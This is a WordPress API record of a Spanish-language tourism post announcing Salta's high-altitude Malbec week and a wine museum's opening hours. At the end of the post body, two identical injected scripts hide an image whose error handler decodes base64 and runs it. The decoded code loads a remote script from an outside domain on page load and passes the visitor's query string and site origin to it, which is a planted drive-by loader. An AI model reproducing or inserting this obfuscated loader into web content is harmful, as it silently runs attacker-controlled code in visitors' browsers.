{"id":4966,"date":"2025-03-21T16:05:05","date_gmt":"2025-03-21T19:05:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4966"},"modified":"2025-08-13T23:38:22","modified_gmt":"2025-08-14T02:38:22","slug":"vivi-la-semana-del-malbec-de-altura-del-14-al-20-de-abril","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4966","title":{"rendered":"Viv\u00ed la Semana del Malbec de Altura del 14 al 20 de Abril."},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1019\" height=\"1024\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n-1019x1024.jpg\" alt=\"\" class=\"wp-image-4968\" style=\"width:174px;height:auto\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n-1019x1024.jpg 1019w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n-300x300.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n-150x150.jpg 150w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n-768x772.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n-418x420.jpg 418w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n-696x699.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n-1068x1073.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/290779910_352383960409516_5345583862221217334_n.jpg 1080w\" sizes=\"(max-width: 1019px) 100vw, 1019px\" \/><\/figure><\/div>\n\n\n<p class=\"has-text-color has-link-color wp-elements-cbb2c01245e22b76862633f901569227\" style=\"color:#7f0544\"><em><strong>Como todos los a\u00f1os el gobierno de la provincia de Salta se suma a la iniciativa de Wine of Argentina para celebrar a su Malbec de Altura con una amplia programaci\u00f3n.<\/strong><\/em><\/p>\n\n\n\n<p>Desde el Museo de la Vid y el Vino junto con Bodegas de Salta se llevar\u00e1 a cabo la doceava edici\u00f3n de la Semana del Malbec de Altura del 14 al 20 de abril para destacar la tipicidad \u00fanica que los suelos del Valle Calchaqu\u00ed aportan a la cepa que representa Argentina en el mundo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"960\" height=\"355\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/483898050_962613776053195_8309756619741960480_n.jpg\" alt=\"\" class=\"wp-image-4967\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/483898050_962613776053195_8309756619741960480_n.jpg 960w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/483898050_962613776053195_8309756619741960480_n-300x111.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/483898050_962613776053195_8309756619741960480_n-768x284.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/483898050_962613776053195_8309756619741960480_n-696x257.jpg 696w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>Durante la semana el Museo propone disfrutar de degustaciones, catas tem\u00e1ticas, maridajes, platos especiales, visitas guiadas en bodegas, cl\u00ednica de Malbec, streamig, m\u00fasica en vivo, sal\u00f3n de vinos a cielo abierto en el Museo y mucho m\u00e1s.<\/p>\n\n\n\n<p>Atento a las redes para ir conociendo la programaci\u00f3n y las bodegas que se suman.<\/p>\n\n\n\n<p>\u00a1TE ESPERAMOS ESTE FINDE XL EN EL MUSEO!.<\/p>\n\n\n\n<p>\u00a1Estaremos abierto del s\u00e1bado 22 al lunes 24 de marzo para que puedas visitarnos en familia!<\/p>\n\n\n\n<p>Martes 25, permaneceremos cerrados.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img decoding=\"async\" width=\"512\" height=\"640\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/480942604_963179869329919_2407227183785326449_n.jpg\" alt=\"\" class=\"wp-image-4969\" style=\"width:167px;height:auto\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/480942604_963179869329919_2407227183785326449_n.jpg 512w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/480942604_963179869329919_2407227183785326449_n-240x300.jpg 240w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/480942604_963179869329919_2407227183785326449_n-336x420.jpg 336w\" sizes=\"(max-width: 512px) 100vw, 512px\" \/><figcaption class=\"wp-element-caption\">Fuente de la Informacion <\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Como todos los a\u00f1os el gobierno de la provincia de Salta se suma a la iniciativa de Wine of Argentina para celebrar a su Malbec de Altura con una amplia programaci\u00f3n. Desde el Museo de la Vid y el Vino junto con Bodegas de Salta se llevar\u00e1 a cabo la doceava edici\u00f3n de la Semana [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4967,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24],"tags":[],"class_list":{"0":"post-4966","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4966"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4966"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4966\/revisions"}],"predecessor-version":[{"id":6544,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4966\/revisions\/6544"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4967"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4966"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4966"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4966"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}